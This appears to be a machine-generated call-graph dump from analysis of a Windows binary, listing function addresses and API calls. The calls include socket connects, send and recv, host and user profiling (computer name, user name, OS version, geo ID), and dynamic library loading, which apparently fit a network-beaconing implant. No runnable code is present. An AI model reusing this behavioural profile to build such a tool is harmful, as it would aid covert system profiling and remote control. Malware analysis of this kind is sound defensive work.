18695->18696 18696->18698 18699 11bc9d0 18696->18699 18698->18684 18700 11bc9db 18699->18700 18701 11bc9e5 18699->18701 18700->18701 18704 11bca01 18700->18704 18702 11baa70 _errno 62 API calls 18701->18702 18703 11bc9ed 18702->18703 18705 11baa08 _invalid_parameter_noinfo 17 API calls 18703->18705 18706 11bc9f9 18704->18706 18707 11baa70 _errno 62 API calls 18704->18707 18705->18706 18706->18698 18707->18703 18710 11a3144 18709->18710 18712 1198394 18709->18712 18713 11a31e0 18710->18713 18712->18398 18712->18404 18714 11a320a 18713->18714 18716 11a3235 18713->18716 18714->18716 18717 11a3250 18714->18717 18716->18712 18720 11a32b0 18717->18720 18719 11a3267 18719->18716 18723 11a32d0 18720->18723 18722 11a32c3 18722->18719 18724 11a32f2 18723->18724 18725 11a32e4 SysFreeString 18723->18725 18724->18722 18725->18724 18728 11b9462 _snprintf 18726->18728 18727 11b9467 18730 11baa70 _errno 62 API calls 18727->18730 18728->18727 18729 11b9486 18728->18729 18742 11bcc2c 18729->18742 18732 11b946c 18730->18732 18734 11baa08 _invalid_parameter_noinfo 17 API calls 18732->18734 18735 119ef64 SHGetKnownFolderPath 18734->18735 18735->18477 18735->18478 18736 11b9a64 write_char 82 API calls 18736->18735 18738 11ae673 CoCreateInstance 18737->18738 18739 119f128 18737->18739 18740 11ae73a CoUninitialize 18738->18740 18741 11ae6a8 18738->18741 18739->18491 18739->18496 18740->18739 18741->18740 18743 11b951c _cftof_l 62 API calls 18742->18743 18744 11bcc97 18743->18744 18745 11baa70 _errno 62 API calls 18744->18745 18746 11bcc9c 18745->18746 18747 11bcca8 18746->18747 18748 11bccd4 18746->18748 18749 11baa70 _errno 62 API calls 18747->18749 18752 11c046c _fileno 62 API calls 18748->18752 18773 11bccf1 std::exception::operator= _snprintf 18748->18773 18751 11bccad 18749->18751 18750 11bcd5f 18754 11baa70 _errno 62 API calls 18750->18754 18753 11baa08 _invalid_parameter_noinfo 17 API calls 18751->18753 18752->18773 18758 11bccb8 18753->18758 18755 11bcd64 18754->18755 18756 11baa08 _invalid_parameter_noinfo 17 API calls 18755->18756 18756->18758 18757 11bc5e0 _cftoe_l 8 API calls 18759 11b94b6 18757->18759 18758->18757 18759->18735 18759->18736 18760 11c09f0 _snprintf 62 API calls 18760->18773 18761 11bcaf8 82 API calls write_char 18761->18773 18762 11baa70 _errno 62 API calls 18763 11bd6c4 18762->18763 18765 11baa08 _invalid_parameter_noinfo 17 API calls 18763->18765 18764 11bd671 18764->18762 18765->18758 18766 11bd228 DecodePointer 18766->18773 18767 11bc600 free 62 API calls 18767->18773 18768 11c06cc __setargv 62 API calls 18768->18773 18769 11bcb94 82 API calls _snprintf 18769->18773 18770 11c1220 64 API calls write_char 18770->18773 18771 11bd282 DecodePointer 18771->18773 18772 11bd2a2 DecodePointer 18772->18773 18773->18750 18773->18758 18773->18760 18773->18761 18773->18764 18773->18766 18773->18767 18773->18768 18773->18769 18773->18770 18773->18771 18773->18772 18774 11bcb40 82 API calls write_multi_char 18773->18774 18774->18773 18776 11b648e 18775->18776 18777 11b5e81 18775->18777 18778 11b5eac 18777->18778 18779 11b5e93 OpenMutexW 18777->18779 18780 11b6470 18778->18780 18781 11b5ed3 18778->18781 18782 11b5ed7 OpenMutexW 18778->18782 18779->18778 18783 11b6478 CloseHandle 18780->18783 18784 11b6483 CloseHandle 18780->18784 18785 11b5f22 CreateEventW 18781->18785 18787 11b6452 18781->18787 18782->18780 18786 11b5efc WaitForSingleObject 18782->18786 18783->18784 18784->18776 18785->18787 18802 11b5f4a 18785->18802 18786->18781 18786->18785 18787->18780 18788 11b645a ReleaseMutex CloseHandle 18787->18788 18788->18780 18789 11b63ce WaitForSingleObject 18792 11b63fd 18789->18792 18793 11b63e2 SetEvent WaitForSingleObject 18789->18793 18790 11b5fc6 WaitForSingleObject 18790->18789 18810 11b5fb9 18790->18810 18791 11b5f8f WaitForSingleObject 18796 11b5fad 18791->18796 18791->18802 18794 11b6419 18792->18794 18795 11b6405 CloseHandle 18792->18795 18793->18792 18799 11b6421 CloseHandle 18794->18799 18800 11b6435 18794->18800 18795->18794 18801 11b643a CloseHandle 18796->18801 18797 11b5fea WaitForSingleObject 18798 11b6020 SleepEx WaitForSingleObject 18797->18798 18804 11b6000 WaitForSingleObject 18797->18804 18803 11b6055 WaitForSingleObject 18798->18803 18798->18810 18799->18800 18806 11b6f00 4 API calls 18800->18806 18801->18787 18802->18791 18802->18810 18803->18810 18805 11b6019 18804->18805 18804->18810 18805->18789 18806->18801 18807 11b63b7 WaitForSingleObject 18807->18810 18809 11b60b4 setsockopt 18809->18810 18811 11b60e7 CreateEventW 18809->18811 18810->18789 18810->18790 18810->18797 18810->18798 18810->18807 18810->18809 18812 11b635c CloseHandle 18810->18812 18813 11b6341 shutdown closesocket 18810->18813 18818 11b63ab ExitProcess 18810->18818 18836 11b7060 18810->18836 18811->18810 18814 11b610b LocalAlloc 18811->18814 18817 11b6385 18812->18817 18813->18812 18815 11b6132 CreateThread 18814->18815 18816 11b6325 CloseHandle 18814->18816 18819 11b617d GetTickCount 18815->18819 18820 11b630c 18815->18820 18816->18810 18817->18810 18818->18810 18834 11b6194 18819->18834 18820->18816 18821 11b6317 LocalFree 18820->18821 18821->18816 18822 11b62a3 shutdown closesocket SetEvent WaitForSingleObject 18853 11b6f00 18822->18853 18823 11b61ab WaitForSingleObject 18824 11b61c6 WaitForSingleObject 18823->18824 18823->18834 18827 11b61e1 WaitForSingleObject 18824->18827 18824->18834 18827->18834 18829 11b62f8 CloseHandle 18829->18820 18830 11b6234 WSAGetLastError 18831 11b6241 GetTickCount 18830->18831 18830->18834 18831->18834 18832 11b6293 Sleep 18832->18822 18832->18834 18833 11b6265 GetTickCount 18833->18834 18834->18822 18834->18823 18834->18824 18834->18830 18834->18832 18834->18833 18835 11b34a0 recv Concurrency::details::platform::__ChangeTimerQueueTimer 18834->18835 18835->18834 18837 11b7100 18836->18837 18838 11b7074 18836->18838 18840 11b710d WaitForMultipleObjects WaitForSingleObject 18837->18840 18842 11b7258 18837->18842 18875 11b52e0 lstrlenW 18838->18875 18843 11b7158 ReleaseMutex 18840->18843 18844 11b716c 18840->18844 18842->18810 18843->18842 18844->18842 18846 11b7249 ReleaseMutex 18844->18846 18847 11b7194 lstrcpyA ReleaseMutex 18844->18847 18845 11b70d6 lstrcpyA 18845->18842 18852 11b7247 SetEvent 18846->18852 18848 11b52e0 213 API calls 18847->18848 18849 11b7214 18848->18849 18851 11b7221 lstrcpyA 18849->18851 18849->18852 18851->18842 18852->18842 18854 11b6f18 18853->18854 18855 11b6f5c SetEvent 18854->18855 18856 11b6f77 18854->18856 18862 11b62f3 18854->18862 18855->18856 18857 11b6faf 18856->18857 18858 11b6f8f WaitForSingleObject 18856->18858 18859 11b6fe2 18857->18859 18860 11b6fc7 CloseHandle 18857->18860 18858->18857 18861 11b6ffa CloseHandle 18859->18861 18859->18862 18860->18859 18861->18862 18863 11a3ae0 18862->18863 18864 11a3aee 18863->18864 18865 11a3b3e 18864->18865 18870 11a3dcd 18864->18870 18873 11a3cd4 18864->18873 18866 11a3b68 SetEvent 18865->18866 18867 11a3b95 18865->18867 18866->18867 18868 11a3c4d 18867->18868 18869 11a3bc3 WaitForSingleObject CloseHandle 18867->18869 18871 11a3ccf 18868->18871 18872 11a3c77 CloseHandle 18868->18872 18869->18868 18870->18829 18871->18829 18872->18871 18873->18870 18874 11a3d8b VirtualFree 18873->18874 18874->18870 18916 11b58e0 18875->18916 18877 11b58c9 18877->18837 18877->18845 18881 11b53df setsockopt 18882 11b542a 18881->18882 18883 11b58a8 shutdown closesocket 18881->18883 18981 11b4dc0 18882->18981 18883->18877 18888 11b4dc0 10 API calls 18889 11b5515 18888->18889 18889->18883 18890 11b4870 10 API calls 18889->18890 18891 11b5560 18890->18891 18891->18883 18892 11b4dc0 10 API calls 18891->18892 18893 11b55c4 18892->18893 18893->18883 19017 11b5ce0 LocalAlloc 18893->19017 18896 11b4dc0 10 API calls 18897 11b562b 18896->18897 18898 11b589a LocalFree 18897->18898 18899 11b4870 10 API calls 18897->18899 18898->18883 18900 11b5678 18899->18900 18900->18898 18901 11b4dc0 10 API calls 18900->18901 18902 11b56dc 18901->18902 18902->18898 19029 11b5ad0 LocalAlloc 18902->19029 18905 11b4dc0 10 API calls 18906 11b5743 18905->18906 18907 11b588c LocalFree 18906->18907 18908 11b4870 10 API calls 18906->18908 18907->18898 18909 11b5790 18908->18909 18909->18907 18910 11b4870 10 API calls 18909->18910 18911 11b57e9 18910->18911 18911->18907 18912 11b5803 CreateEventW 18911->18912 18912->18907 18913 11b5829 WSAEventSelect 18912->18913 18914 11b5849 und_memcpy 18913->18914 18915 11b587e CloseHandle 18913->18915 18914->18877 18915->18907 19044 11b20c0 18916->19044 18919 11b533e 18919->18877 18926 11b3c70 socket 18919->18926 18920 11b5918 CoCreateGuid 18921 11b592b StringFromGUID2 18920->18921 18922 11b5a04 CoUninitialize 18920->18922 18921->18922 18923 11b5949 wsprintfA LocalAlloc 18921->18923 18922->18919 18923->18922 18924 11b5986 und_memcpy 18923->18924 18925 11b59e9 LocalFree CoUninitialize 18924->18925 18925->18919 18927 11b3cad 18926->18927 18928 11b3cb4 WSAGetLastError WSACreateEvent 18926->18928 18927->18877 18927->18881 18929 11b3ccd 18928->18929 18930 11b3cd7 WSAEventSelect 18928->18930 18931 11b42ac shutdown closesocket 18929->18931 18932 11b3cfb 18930->18932 18978 11b3cf1 18930->18978 18931->18927 18934 11b3d0b 18932->18934 18935 11b3f1e 18932->18935 18933 11b42a1 CloseHandle 18933->18931 18936 11b3d17 18934->18936 18937 11b3d24 inet_addr 18934->18937 18938 11b3f45 inet_addr 18935->18938 18939 11b3f35 18935->18939 18940 11b3d76 htons connect 18936->18940 18937->18940 18941 11b3d3d gethostbyname 18937->18941 18942 11b3fa9 htons connect 18938->18942 18943 11b3f64 gethostbyname 18938->18943 18939->18942 18945 11b3dba WSAGetLastError 18940->18945 18940->18978 18941->18936 18941->18978 18942->18933 18944 11b3ffc WSAGetLastError 18942->18944 18943->18939 18943->18978 18944->18933 18947 11b400d WSAWaitForMultipleEvents 18944->18947 18948 11b3dcb WSAWaitForMultipleEvents 18945->18948 18945->18978 18950 11b4089 18947->18950 18951 11b40a0 WSACloseEvent closesocket 18947->18951 18952 11b3e49 18948->18952 18953 11b3e2c WSACloseEvent closesocket 18948->18953 18950->18951 18958 11b40bd 18950->18958 18951->18927 18954 11b3e53 WSACloseEvent closesocket 18952->18954 18955 11b3e70 18952->18955 18953->18927 18954->18927 18956 11b3e77 WSAEnumNetworkEvents 18955->18956 18957 11b3ef5 18955->18957 18959 11b3ead 18956->18959 18960 11b3e90 closesocket WSACloseEvent 18956->18960 18961 11b3efc closesocket WSACloseEvent 18957->18961 18957->18978 18958->18933 18962 11b40cb WSAEnumNetworkEvents 18958->18962 18963 11b3eb8 closesocket WSACloseEvent 18959->18963 18964 11b3ed5 18959->18964 18960->18927 18961->18927 18965 11b40e7 WSACloseEvent closesocket 18962->18965 18966 11b4104 18962->18966 18963->18927 18964->18957 18967 11b3ee0 WSACloseEvent 18964->18967 18965->18927 18968 11b412b 18966->18968 18969 11b410e WSACloseEvent closesocket 18966->18969 18967->18927 18970 11b4152 inet_addr 18968->18970 18971 11b4137 18968->18971 18969->18927 18970->18971 18972 11b421a 18971->18972 18973 11b4197 18971->18973 18972->18933 19060 11b4470 LocalAlloc 18972->19060 19046 11b42e0 LocalAlloc 18973->19046 18977 11b4200 CloseHandle 18977->18927 18978->18933 18980 11b428f CloseHandle 18980->18927 18980->18933 18982 11b4e09 18981->18982 18983 11b4de4 18981->18983 18985 11b4e50 WSACreateEvent 18982->18985 18986 11b4e04 18982->18986 19092 11b34e0 send 18983->19092 18985->18986 18995 11b4e76 18985->18995 18986->18883 18999 11b4870 18986->18999 18987 11b4f88 18987->18986 18988 11b52ae CloseHandle 18987->18988 18988->18986 18989 11b4f27 WaitForSingleObject 18989->18995 18991 11b4fe6 WaitForSingleObject 18991->18995 18992 11b50d9 WSAGetLastError 18992->18987 18993 11b50ea WSAEventSelect 18992->18993 18993->18987 18994 11b5120 WSAWaitForMultipleEvents 18993->18994 18994->18987 18994->18995 18995->18987 18995->18989 18995->18991 18995->18992 18996 11b5223 WSAEnumNetworkEvents 18995->18996 18998 11b51a0 18995->18998 19093 11b34e0 send 18995->19093 18996->18987 18996->18995 18997 11b51cd WaitForSingleObject 18997->18998 18998->18987 18998->18997 19000 11b48b9 18999->19000 19001 11b4894 18999->19001 19003 11b4900 WSACreateEvent 19000->19003 19004 11b48b4 19000->19004 19094 11b34a0 recv 19001->19094 19003->19004 19013 11b4926 19003->19013 19004->18883 19004->18888 19005 11b4a47 19005->19004 19006 11b4d81 CloseHandle 19005->19006 19006->19004 19007 11b49e6 WaitForSingleObject 19007->19013 19009 11b4aa5 WaitForSingleObject 19009->19013 19010 11b4bac WSAGetLastError 19010->19005 19011 11b4bbd WSAEventSelect 19010->19011 19011->19005 19012 11b4bf3 WSAWaitForMultipleEvents 19011->19012 19012->19005 19012->19013 19013->19005 19013->19007 19013->19009 19013->19010 19014 11b4cf6 WSAEnumNetworkEvents 19013->19014 19016 11b4c73 19013->19016 19095 11b34a0 recv 19013->19095 19014->19005 19014->19013 19015 11b4ca0 WaitForSingleObject 19015->19016 19016->19005 19016->19015 19018 11b5d08 lstrcpyW 19017->19018 19019 11b55d5 19017->19019 19020 11adef0 3 API calls 19018->19020 19019->18883 19019->18896 19021 11b5d40 GetModuleFileNameW 19020->19021 19022 11b5d5f LocalFree 19021->19022 19023 11b5d71 19021->19023 19022->19019 19024 11b5da7 lstrlenW 19023->19024 19025 11b5d95 LocalFree 19023->19025 19026 11b5ddd LocalFree 19024->19026 19027 11b5dec GetCurrentProcessId wnsprintfW 19024->19027 19025->19019 19026->19019 19096 1198eb0 19027->19096 19030 11b5af8 LoadLibraryW 19029->19030 19031 11b56ed 19029->19031 19032 11b5b12 LocalFree 19030->19032 19033 11b5b24 GetProcAddress 19030->19033 19031->18898 19031->18905 19032->19031 19034 11b5b43 LocalFree 19033->19034 19035 11b5b55 _snprintf 19033->19035 19034->19031 19036 11b5b67 RtlGetVersion 19035->19036 19037 11b5b7e LocalFree 19036->19037 19038 11b5b90 GetUserGeoID gethostname 19036->19038 19037->19031 19039 11b5c07 gethostbyname 19038->19039 19040 11b5cb6 LocalFree 19038->19040 19039->19040 19041 11b5c2c GetComputerNameExW 19039->19041 19040->19031 19041->19040 19042 11b5c73 GetUserNameW 19041->19042 19042->19040 19043 11b5c9d GetTickCount64 19042->19043 19043->19031 19045 11b20d6 CoInitializeEx 19044->19045 19045->18919 19045->18920 19047 11b41f8 19046->19047 19048 11b4357 htons 19046->19048 19047->18977 19047->18978 19074 11b4750 WSACreateEvent 19048->19074 19051 11b4457 LocalFree 19051->19047 19053 11b43c5 19053->19051 19082 11b4630 WSACreateEvent 19053->19082 19057 11b440a 19057->19051 19058 11b442c und_memcpy 19057->19058 19059 11b4448 LocalFree 19058->19059 19059->19047 19061 11b44e9 htons wsprintfA 19060->19061 19062 11b4287 19060->19062 19063 11b4750 5 API calls 19061->19063 19062->18933 19062->18980 19064 11b455a 19063->19064 19065 11b460d LocalFree 19064->19065 19090 11b34e0 send 19064->19090 19065->19062 19067 11b457d 19067->19065 19068 11b4630 5 API calls 19067->19068 19069 11b45a0 19068->19069 19069->19065 19091 11b34a0 recv 19069->19091 19071 11b45c0 19071->19065 19072 11b45e2 und_memcpy 19071->19072 19073 11b45fe LocalFree 19072->19073 19073->19062 19075 11b477f WSAEventSelect 19074->19075 19080 11b43a1 19074->19080 19076 11b4854 WSACloseEvent 19075->19076 19078 11b479d WSAWaitForMultipleEvents WSACloseEvent 19075->19078 19076->19080 19079 11b480f 19078->19079 19078->19080 19079->19076 19079->19080 19080->19051 19081 11b34e0 send 19080->19081 19081->19053 19083 11b465f WSAEventSelect 19082->19083 19088 11b43ea 19082->19088 19084 11b467d WSAWaitForMultipleEvents WSACloseEvent 19083->19084 19085 11b4734 WSACloseEvent 19083->19085 19087 11b46ef 19084->19087 19084->19088 19085->19088 19087->19085 19087->19088 19088->19051 19089 11b34a0 recv 19088->19089 19089->19057 19090->19067 19091->19071 19092->18986 19093->18995 19094->19004 19095->19013 19097 11b84a8 89 API calls 19096->19097 19098 1198ed9 RegGetValueW 19097->19098 19099 1198f24 19098->19099 19099->19019 17344 11bc7a8 17345 11bc83c 17344->17345 17346 11bc7c0 17344->17346 17347 11bc868 _callnewh DecodePointer 17345->17347 17349 11bc7f8 HeapAlloc 17346->17349 17353 11bc821 17346->17353 17357 11bc7d8 17346->17357 17358 11bc826 17346->17358 17410 11bc868 DecodePointer 17346->17410 17348 11bc841 17347->17348 17350 11baa70 _errno 61 API calls 17348->17350 17349->17346 17351 11bc831 17349->17351 17350->17351 17412 11baa70 17353->17412 17357->17349 17361 11bec1c 17357->17361 17370 11be9bc 17357->17370 17407 11be60c 17357->17407 17360 11baa70 _errno 61 API calls 17358->17360 17360->17351 17415 11c26c8 17361->17415 17364 11bec39 17366 11be9bc _amsg_exit 62 API calls 17364->17366 17368 11bec5a 17364->17368 17365 11c26c8 _set_error_mode 62 API calls 17365->17364 17367 11bec50 17366->17367 17369 11be9bc _amsg_exit 62 API calls 17367->17369 17368->17357 17369->17368 17371 11be9f0 _amsg_exit 17370->17371 17372 11c26c8 _set_error_mode 59 API calls 17371->17372 17406 11beb42 17371->17406 17374 11bea06 17372->17374 17373 11bc5e0 _cftoe_l 8 API calls 17375 11bebfc 17373->17375 17376 11beb84 GetStdHandle 17374->17376 17377 11c26c8 _set_error_mode 59 API calls 17374->17377 17375->17357 17379 11beb97 std::exception::operator= 17376->17379 17376->17406 17378 11bea17 17377->17378 17378->17376 17378->17406 17455 11c265c 17378->17455 17381 11bebd1 WriteFile 17379->17381 17379->17406 17381->17406 17383 11bea5d GetModuleFileNameW 17385 11bea83 17383->17385 17390 11beaac _amsg_exit 17383->17390 17384 11beb70 17386 11ba964 _fltout2 16 API calls 17384->17386 17387 11c265c _amsg_exit 59 API calls 17385->17387 17388 11beb83 17386->17388 17389 11bea94 17387->17389 17388->17376 17389->17390 17393 11ba964 _fltout2 16 API calls 17389->17393 17391 11beb04 17390->17391 17464 11c258c 17390->17464 17473 11c2504 17391->17473 17393->17390 17395 11beb5b 17399 11ba964 _fltout2 16 API calls 17395->17399 17397 11c2504 _amsg_exit 59 API calls 17400 11beb29 17397->17400 17399->17384 17402 11beb2d 17400->17402 17403 11beb47 17400->17403 17401 11ba964 _fltout2 16 API calls 17401->17391 17482 11c22fc 17402->17482 17405 11ba964 _fltout2 16 API calls 17403->17405 17405->17395 17406->17373 17501 11be5d0 GetModuleHandleW 17407->17501 17411 11bc883 17410->17411 17411->17346 17504 11bad14 GetLastError FlsGetValue 17412->17504 17414 11baa79 17414->17358 17416 11c26d0 17415->17416 17417 11baa70 _errno 62 API calls 17416->17417 17420 11bec2a 17416->17420 17418 11c26f5 17417->17418 17421 11baa08 17418->17421 17420->17364 17420->17365 17424 11ba998 DecodePointer 17421->17424 17425 11ba9f7 17424->17425 17426 11ba9d6 17424->17426 17431 11ba964 17425->17431 17426->17420 17434 11ba818 17431->17434 17435 11ba852 _snprintf _cftoe_l 17434->17435 17436 11ba86e RtlCaptureContext RtlLookupFunctionEntry 17435->17436 17437 11ba8de 17436->17437 17438 11ba8a7 RtlVirtualUnwind 17436->17438 17439 11ba8fa IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17437->17439 17438->17439 17440 11ba92c _cftoe_l 17439->17440 17443 11bc5e0 17440->17443 17442 11ba94b GetCurrentProcess TerminateProcess 17444 11bc5e9 17443->17444 17445 11c0ed4 RtlCaptureContext RtlLookupFunctionEntry 17444->17445 17446 11bc5f4 17444->17446 17447 11c0f18 RtlVirtualUnwind 17445->17447 17448 11c0f59 17445->17448 17446->17442 17449 11c0f7b IsDebuggerPresent 17447->17449 17448->17449 17454 11c0a80 17449->17454 17451 11c0fda SetUnhandledExceptionFilter UnhandledExceptionFilter 17452 11c0ff8 _cftoe_l 17451->17452 17453 11c1002 GetCurrentProcess TerminateProcess 17451->17453 17452->17453 17453->17442 17454->17451 17456 11c266d 17455->17456 17457 11c2677 17455->17457 17456->17457 17462 11c2694 17456->17462 17458 11baa70 _errno 62 API calls 17457->17458 17459 11c2680 17458->17459 17460 11baa08 _invalid_parameter_noinfo 17 API calls 17459->17460 17461 11bea53 17460->17461 17461->17383 17461->17384 17462->17461 17463 11baa70 _errno 62 API calls 17462->17463 17463->17459 17465 11c259c 17464->17465 17467 11beaec 17465->17467 17469 11c25a1 17465->17469 17471 11c25df 17465->17471 17466 11baa70 _errno 62 API calls 17468 11c25cb 17466->17468 17467->17391 17467->17401 17470 11baa08 _invalid_parameter_noinfo 17 API calls 17468->17470 17469->17466 17469->17467 17470->17467 17471->17467 17472 11baa70 _errno 62 API calls 17471->17472 17472->17468 17474 11c251f 17473->17474 17476 11c2515 17473->17476 17475 11baa70 _errno 62 API calls 17474->17475 17481 11c2528 17475->17481 17476->17474 17479 11c2556 17476->17479 17477 11baa08 _invalid_parameter_noinfo 17 API calls 17478 11beb17 17477->17478 17478->17395 17478->17397 17479->17478 17480 11baa70 _errno 62 API calls 17479->17480 17480->17481 17481->17477 17500 11bac28 EncodePointer 17482->17500 17502 11be5ea GetProcAddress 17501->17502 17503 11be5ff ExitProcess 17501->17503 17502->17503 17505 11bad3a 17504->17505 17506 11bad82 SetLastError 17504->17506 17516 11c074c 17505->17516 17506->17414 17508 11bad47 17508->17506 17509 11bad4f FlsSetValue 17508->17509 17510 11bad7b 17509->17510 17511 11bad65 17509->17511 17530 11bc600 17510->17530 17521 11bac5c 17511->17521 17514 11bad80 17514->17506 17517 11c0771 17516->17517 17519 11c07b1 17517->17519 17520 11c078f Sleep 17517->17520 17536 11c2dec 17517->17536 17519->17508 17520->17517 17520->17519 17544 11c0c94 17521->17544 17531 11bc605 RtlFreeHeap 17530->17531 17535 11bc635 realloc 17530->17535 17532 11bc620 17531->17532 17531->17535 17533 11baa70 _errno 60 API calls 17532->17533 17534 11bc625 GetLastError 17533->17534 17534->17535 17535->17514 17537 11c2e1e 17536->17537 17538 11c2e01 17536->17538 17541 11c2e36 HeapAlloc 17537->17541 17542 11c2e14 17537->17542 17543 11bc868 _callnewh DecodePointer 17537->17543 17538->17537 17539 11c2e0f 17538->17539 17540 11baa70 _errno 61 API calls 17539->17540 17540->17542 17541->17537 17541->17542 17542->17517 17543->17537 17545 11c0cb2 17544->17545 17546 11c0cc3 EnterCriticalSection 17544->17546 17550 11c0bac 17545->17550 17551 11c0bea 17550->17551 17552 11c0bd3 17550->17552 17554 11c0bff 17551->17554 17582 11c06cc 17551->17582 17553 11bec1c _FF_MSGBANNER 60 API calls 17552->17553 17555 11c0bd8 17553->17555 17554->17546 17575 11be968 17554->17575 17557 11be9bc _amsg_exit 60 API calls 17555->17557 17559 11c0be0 17557->17559 17563 11be60c malloc 3 API calls 17559->17563 17560 11c0c24 17562 11c0c94 _lock 60 API calls 17560->17562 17561 11c0c15 17564 11baa70 _errno 60 API calls 17561->17564 17565 11c0c2e 17562->17565 17563->17551 17564->17554 17566 11c0c3a InitializeCriticalSectionAndSpinCount 17565->17566 17567 11c0c67 17565->17567 17568 11c0c49 17566->17568 17574 11c0c56 LeaveCriticalSection 17566->17574 17569 11bc600 free 60 API calls 17567->17569 17570 11bc600 free 60 API calls 17568->17570 17569->17574 17572 11c0c51 17570->17572 17573 11baa70 _errno 60 API calls 17572->17573 17573->17574 17574->17554 17576 11bec1c _FF_MSGBANNER 62 API calls 17575->17576 17577 11be975 17576->17577 17578 11be9bc _amsg_exit 62 API calls 17577->17578 17579 11be97c 17578->17579 17604 11be7a0 17579->17604 17583 11c06f4 17582->17583 17585 11c072c 17583->17585 17586 11c0708 Sleep 17583->17586 17587 11bc7a8 17583->17587 17585->17560 17585->17561 17586->17583 17586->17585 17588 11bc83c 17587->17588 17589 11bc7c0 17587->17589 17590 11bc868 _callnewh DecodePointer 17588->17590 17592 11bc7f8 HeapAlloc 17589->17592 17596 11bc821 17589->17596 17598 11bc868 _callnewh DecodePointer 17589->17598 17600 11bc7d8 17589->17600 17601 11bc826 17589->17601 17591 11bc841 17590->17591 17593 11baa70 _errno 61 API calls 17591->17593 17592->17589 17594 11bc831 17592->17594 17593->17594 17594->17583 17595 11bec1c _FF_MSGBANNER 61 API calls 17595->17600 17599 11baa70 _errno 61 API calls 17596->17599 17597 11be9bc _amsg_exit 61 API calls 17597->17600 17598->17589 17599->17601 17600->17592 17600->17595 17600->17597 17602 11be60c malloc 3 API calls 17600->17602 17603 11baa70 _errno 61 API calls 17601->17603 17602->17600 17603->17594 17605 11c0c94 _lock 56 API calls 17604->17605 17606 11be7ce 17605->17606 17607 11be7f5 DecodePointer 17606->17607 17612 11be8b6 _initterm 17606->17612 17609 11be813 DecodePointer 17607->17609 17607->17612 17620 11be838 17609->17620 17613 11be8ec 17612->17613 17624 11c0b94 LeaveCriticalSection 17612->17624 17615 11be917 17613->17615 17625 11c0b94 LeaveCriticalSection 17613->17625 17618 11be857 DecodePointer 17623 11bac28 EncodePointer 17618->17623 17620->17612 17620->17618 17621 11be86d DecodePointer DecodePointer 17620->17621 17622 11bac28 EncodePointer 17620->17622 17621->17620 22773 11b3610 22776 11b3640 22773->22776 22774 11b4750 5 API calls 22774->22776 22775 11b366b 22776->22774 22776->22775 22778 11b34e0 send 22776->22778 22778->22776 18291 11bc600 18292 11bc605 RtlFreeHeap 18291->18292 18296 11bc635 realloc 18291->18296 18293 11bc620 18292->18293 18292->18296 18294 11baa70 _errno 60 API calls 18293->18294 18295 11bc625 GetLastError 18294->18295 18295->18296 19100 11b98b4 GetStartupInfoW 19101 11b98e3 19100->19101 19145 11bf6dc HeapCreate 19101->19145 19104 11b994a 19150 11baef0 19104->19150 19106 11b9931 19109 11bec1c _FF_MSGBANNER 62 API calls 19106->19109 19107 11b9936 19110 11be9bc _amsg_exit 62 API calls 19107->19110 19109->19107 19112 11b9940 19110->19112 19113 11be60c malloc 3 API calls 19112->19113 19113->19104 19146 11b9924 19145->19146 19147 11bf704 GetVersion 19145->19147 19146->19104 19146->19106 19146->19107 19148 11bf728 19147->19148 19149 11bf70e HeapSetInformation 19147->19149 19148->19146 19149->19148 19258 11be63c 19150->19258 19261 11bac28 EncodePointer 19258->19261 17267 11a90fb 17268 11a910b 17267->17268 17269 11a911d 17268->17269 17270 11a9203 LoadLibraryExW 17268->17270 17273 11a91a1 GetProcAddress 17269->17273 17274 11a9127 17269->17274 17271 11a922a 17270->17271 17272 11a9223 17270->17272 17278 11a9259 17271->17278 17279 11a9345 LoadLibraryW 17271->17279 17275 11a91fe 17273->17275 17276 11a9198 17273->17276 17277 11a9154 GetProcAddress 17274->17277 17275->17270 17276->17272 17277->17276 17280 11a919f 17277->17280 17282 11a9263 17278->17282 17283 11a92e0 GetProcAddress 17278->17283 17279->17272 17281 11a9366 17279->17281 17280->17275 17285 11a947b LoadLibraryW 17281->17285 17286 11a9395 17281->17286 17287 11a9290 GetProcAddress 17282->17287 17283->17276 17284 11a9340 17283->17284 17284->17279 17285->17272 17289 11a94a2 17285->17289 17290 11a9419 GetProcAddress 17286->17290 17291 11a939f 17286->17291 17287->17276 17288 11a92de 17287->17288 17288->17284 17293 11a95bd LoadLibraryExW 17289->17293 17294 11a94d1 17289->17294 17290->17276 17292 11a9476 17290->17292 17295 11a93cc GetProcAddress 17291->17295 17292->17285 17293->17272 17296 11a95de 17293->17296 17297 11a94db 17294->17297 17298 11a9558 GetProcAddress 17294->17298 17295->17276 17299 11a9417 17295->17299 17301 11a960d 17296->17301 17302 11a96f3 LoadLibraryExW 17296->17302 17303 11a9508 GetProcAddress 17297->17303 17298->17276 17300 11a95b8 17298->17300 17299->17292 17300->17293 17305 11a9691 GetProcAddress 17301->17305 17306 11a9617 17301->17306 17302->17272 17304 11a971a 17302->17304 17303->17276 17307 11a9556 17303->17307 17309 11a9749 17304->17309 17310 11a9835 LoadLibraryExW 17304->17310 17305->17276 17308 11a96ee 17305->17308 17311 11a9644 GetProcAddress 17306->17311 17307->17300 17308->17302 17312 11a9753 17309->17312 17313 11a97d0 GetProcAddress 17309->17313 17310->17272 17315 11a9856 17310->17315 17311->17276 17314 11a968f 17311->17314 17319 11a9780 GetProcAddress 17312->17319 17313->17276 17316 11a9830 17313->17316 17314->17308 17317 11a996b LoadLibraryExW 17315->17317 17318 11a9885 17315->17318 17316->17310 17317->17272 17323 11a998c 17317->17323 17320 11a9909 GetProcAddress 17318->17320 17321 11a988f 17318->17321 17319->17276 17322 11a97ce 17319->17322 17320->17276 17324 11a9966 17320->17324 17325 11a98bc GetProcAddress 17321->17325 17322->17316 17326 11a9aa1 LoadLibraryExW 17323->17326 17328 11a9a3f GetProcAddress 17323->17328 17329 11a99c5 17323->17329 17324->17317 17325->17276 17327 11a9907 17325->17327 17326->17272 17330 11a9ac2 17326->17330 17327->17324 17328->17276 17331 11a9a3d 17328->17331 17332 11a99f2 GetProcAddressForCaller 17329->17332 17333 11a9af1 17330->17333 17334 11a9bd7 LoadLibraryExW 17330->17334 17331->17326 17332->17272 17332->17331 17335 11a9afb 17333->17335 17336 11a9b75 GetProcAddress 17333->17336 17334->17272 17341 11a9bf8 17334->17341 17338 11a9b28 GetProcAddress 17335->17338 17336->17276 17337 11a9bd2 17336->17337 17337->17334 17338->17276 17339 11a9b73 17338->17339 17339->17337 17340 11a9ca8 GetProcAddress 17340->17276 17340->17341 17341->17272 17343 11a9c27 17341->17343 17342 11a9c5e GetProcAddress 